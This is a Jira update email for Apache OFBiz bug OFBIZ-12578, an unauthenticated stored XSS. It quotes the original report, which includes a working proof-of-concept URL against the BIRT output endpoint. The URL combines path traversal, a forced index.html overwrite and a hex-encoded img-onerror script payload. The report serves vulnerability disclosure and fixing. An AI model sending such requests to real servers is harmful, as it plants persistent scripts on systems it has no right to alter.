[jira] [Updated] (OFBIZ-12578) Unauth Stored XSS

Jacques Le Roux (Jira) Mon, 21 Feb 2022 05:29:15 -0800


     [ 
https://issues.apache.org/jira/browse/OFBIZ-12578?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]


Jacques Le Roux updated OFBIZ-12578:
------------------------------------
    Description:     (was: *Description of the vulnerability*
*Unauth Stored XSS*

So, let's try to create an html file in the current folder — index.html. An 
attacker could inject
a malicious payload and execute it using Stored XSS.

https://192.168.0.13:8443/birt/output?__report=./../ordermgr/reports/
SalesReport.rptdesign&__format=html&__overwrite=true&__document=index.html&reportBy=%3c%69%6d%67%20%73%72%63%3d%31%20%6f%6e%65%72%72%6f%72%3d%61%6c
%65%72%74%28%29%3e

!image-2022-02-21-16-04-20-703.png!

When accessed along the path /birt/index.html, the injected malicious load will 
be executed.

!image-2022-02-21-16-04-53-035.png!)

> Unauth Stored XSS
> -----------------
>
>                 Key: OFBIZ-12578
>                 URL: https://issues.apache.org/jira/browse/OFBIZ-12578
>             Project: OFBiz
>          Issue Type: Bug
>    Affects Versions: 18.12.05
>            Reporter: Nikita Podotykin
>            Priority: Major
>             Fix For: 18.12.05
>
>   Original Estimate: 72h
>  Remaining Estimate: 72h
>




--
This message was sent by Atlassian Jira
(v8.20.1#820001)

[jira] [Updated] (OFBIZ-12578) Unauth Stored XSS

Reply via email to